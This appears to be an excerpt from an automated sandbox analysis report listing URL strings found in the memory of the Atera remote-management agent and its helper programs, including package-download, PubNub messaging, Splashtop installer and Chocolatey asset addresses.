Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003F8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500409000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageMonitoring/0.40/AgentPackageMonitoring.z
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003F8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageSTRemote/2.6/AgentPackageSTRemote.zip
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500409000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageSTRemote/2.6/AgentPackageSTRemote.ziph
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.IotPoc/0.2/Agent.Package.IotPoc.zip
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500409000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageAgentInformation/38.3/AgentPackageAgentInformation
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003F8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageMonitoring/37.8/AgentPackageMonitoring.zip
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500409000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageMonitoring/37.8/AgentPackageMonitoring.ziph
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageNetworkDiscovery/13.0/AgentPackageNetworkDiscovery
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageRuntimeInstaller/1.5/AgentPackageRuntimeInstaller.
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003F8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageSTRemote/24.3/AgentPackageSTRemote.zip
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500409000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageSTRemote/24.3/AgentPackageSTRemote.ziph
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageTaskScheduler/13.0/AgentPackageTaskScheduler.zip
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesne
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet
Source: AteraAgent.exe, 00000018.00000002.2666352179.00000251008DB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Availability/0.16/Agent.Package.Availa
Source: AteraAgent.exe, 00000018.00000002.2666352179.00000251008DB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Availability/0.16/Agent.Package.Availability.z
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.IotPoc/0.2/Agent.Package.IotPoc.zip
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Watchdog/1.9/Agent.Package.Watchdog.zip
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/Agent.Package.Watchdog/1.9/Agent.Package.Watchdog.zip?j1lnlD
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageADRemote/6.0/AgentPackageADRemote.zip
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageADRemote/6.0/AgentPackageADRemote.zip?j1lnlDvC8Z
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500409000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageAgentInformation/38.3/AgentPackageAgentInformati
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageHeartbeat/17.14/AgentPackageHeartbeat.zip
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100136000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageInternalPoller/23.8/AgentPackageInternalPoller.z
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zip
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zip?j1ln
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003F8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/37.8/AgentPackageMonitoring.zip
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100136000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/37.8/AgentPackageMonitoring.zip?j1lnl
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500409000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageMonitoring/37.8/AgentPackageMonitoring.ziph
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageNetworkDiscovery/23.9/AgentPackageNetworkDiscove
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageOsUpdates/20.9/AgentPackageOsUpdates.zip
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100136000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageOsUpdates/20.9/AgentPackageOsUpdates.zip?j1lnlDv
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageProgramManagement/26.3/AgentPackageProgramManage
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageRuntimeInstaller/1.6/AgentPackageRuntimeInstalle
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003F8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/24.3/AgentPackageSTRemote.zip
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/24.3/AgentPackageSTRemote.zip?j1lnlDvC8
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500409000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSTRemote/24.3/AgentPackageSTRemote.ziph
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSystemTools/27.10/AgentPackageSystemTools.zip
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageSystemTools/27.10/AgentPackageSystemTools.zip?j1
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTaskScheduler/17.2/AgentPackageTaskScheduler.zip
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageTicketing/30.2/AgentPackageTicketing.zip
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageUpgradeAgent/27.6/AgentPackageUpgradeAgent.zip
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackagesnet45/AgentPackageWindowsUpdate/24.6/AgentPackageWindowsUpdate.zip
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackageswin/Agent.Package.IotPoc/13.0/Agent.Package.IotPoc.zip
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500409000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageAgentInformation/22.7/AgentPackageAgentInformation
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003F8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500409000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageMonitoring/22.0/AgentPackageMonitoring.zip
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageRuntimeInstaller/13.0/AgentPackageRuntimeInstaller
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003F8000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500409000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageSTRemote/16.0/AgentPackageSTRemote.zip
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50007C000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500057000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/agentpackageswin/AgentPackageTaskScheduler/13.1/AgentPackageTaskScheduler.zip
Source: AgentPackageUpgradeAgent.exe, 0000002D.00000000.2421755187.0000019F9B462000.00000002.00000001.01000000.00000027.sdmp	String found in binary or memory: https://ps.atera.com/installers/Agents/Mac/
Source: AgentPackageUpgradeAgent.exe, 0000002D.00000000.2421755187.0000019F9B462000.00000002.00000001.01000000.00000027.sdmp	String found in binary or memory: https://ps.atera.com/installers/Agents/Windows/
Source: AgentPackageTicketing.exe, 00000031.00000002.2959271020.0000021F24FC2000.00000002.00000001.01000000.0000003C.sdmp	String found in binary or memory: https://ps.atera.com/installers/EO.WebBrowser/eo.webbrowser.24.1.46.nupkg
Source: AgentPackageTicketing.exe, 00000031.00000002.2962491449.0000021F25809000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.com/installers/EO.WebBrowser/eo.webbrowser.24.1.46.nupkgX
Source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A5727E0000.00000004.00000020.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000002.2945403740.0000023000111000.00000004.00000800.00020000.00000000.sdmp, AgentPackageSTRemote.exe, 00000021.00000000.2113797571.0000023071932000.00000002.00000001.01000000.0000001A.sdmp	String found in binary or memory: https://ps.atera.com/installers/splashtop/win/SplashtopStreamer.exe
Source: AgentPackageTicketing.exe, 00000031.00000002.2959271020.0000021F24FC2000.00000002.00000001.01000000.0000003C.sdmp	String found in binary or memory: https://ps.atera.com/translations/TicketingTray/
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.atera.comnsdk
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003AB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003BC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.pndsn
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003AB000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.pndsn.com
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A500167000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=1eecf8b3-cc2b-4957-b7fa-87c63e22c68a
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50046D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=2dabf02b-2c30-4ed5-8069-cac60b083345
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=627e4e44-2e9f-4cc7-96cc-3b14ba948711
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=9625d337-cdbc-4fbf-a5fb-6929d4dcc79e
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A5000A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=d7152bb4-b8cc-4674-a783-7f6c6e342ec3
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003AB000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=d9fe0dc7-ad54-4df6-b3af-79602ffd1f4b
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50010E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.pndsn.com/time/0?pnsdk=NET45CSharp6.13.0.0&requestid=dba4e63d-fa85-48f6-b00c-ec5d6483e5eb
Source: AteraAgent.exe, 00000018.00000002.2666352179.000002510071B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.pndsn.com/v
Source: AteraAgent.exe, 00000018.00000002.2666352179.000002510071B000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.0000025100222000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/channel/dfb304ca
Source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100089000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.pndsn.com/v2/presence/sub_key/sub-c-a02ceca8-a958-1p
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A5000A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.pndsn.com/v2/subscribe/
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A5003BC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A5000A2000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251000E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.pndsn.com/v2/subscribe/sub-c-a02ceca8-a958-11e5-bd8c-0619f8945a4f/dfb304ca-1bde-49cc-a755
Source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A5000A2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ps.pndsn.comce
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/JetBrains/Chocolatey/master/TeamCityAddin/logo.png
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/asciidoctor/asciidoctorj/main/LICENSE.txt
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://raw.githubusercontent.com/johanjanssen/AdoptOpenJDKChocolateyPackages/master/AdoptOpenJDK/Ad
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3024000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB307C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rawcdn.githack.com/ajshastri/chocolatey-packages/a698d21b3c63b9ff7e01f442f37cdb7ecf89925a/ic
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB319B000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3074000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://rawcdn.githack.com/johanjanssen/AdoptOpenJDKChocolateyPackages/301e926794e98de48f9c9f3a32b18
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://repo1.maven.org/maven2/org/flywaydb/flyway-commandline/10.21.0/flyway-commandline-10.21.0-wi
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://search.maven.org/remotecontent?filepath=org/asciidoctor/asciidoctorj/2.5.13/asciidoctorj-2.5
Source: AgentPackageTicketing.exe, 00000031.00000002.2959271020.0000021F24FC2000.00000002.00000001.01000000.0000003C.sdmp	String found in binary or memory: https://setup-app-resolver.atera.com
Source: AgentPackageMonitoring.exe, 00000024.00000002.2218789671.00000247F8AE2000.00000002.00000001.01000000.00000022.sdmp	String found in binary or memory: https://system.data.sqlite.org/
Source: AgentPackageMonitoring.exe, 00000024.00000002.2219056009.00000247F8B44000.00000002.00000001.01000000.00000022.sdmp	String found in binary or memory: https://system.data.sqlite.org/X
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://teamcity-support.jetbrains.com/hc/en-us/community/topics
Source: AgentPackageMonitoring.exe, 00000024.00000002.2218789671.00000247F8AE2000.00000002.00000001.01000000.00000022.sdmp	String found in binary or memory: https://urn.to/r/sds_see
Source: AgentPackageTicketing.exe, 00000031.00000002.2959271020.0000021F24FC2000.00000002.00000001.01000000.0000003C.sdmp	String found in binary or memory: https://westeurope-5.in.applicationinsights.azure.com/;LiveEndpoint=https://westeurope.livediagnosti
Source: AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB34D1000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.3050070641.0000011CC2ECB000.00000004.00000800.00020000.00000000.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2963836971.0000011CB3124000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://wiki.openjdk.java.net/display/JDKUpdates/JDK11u
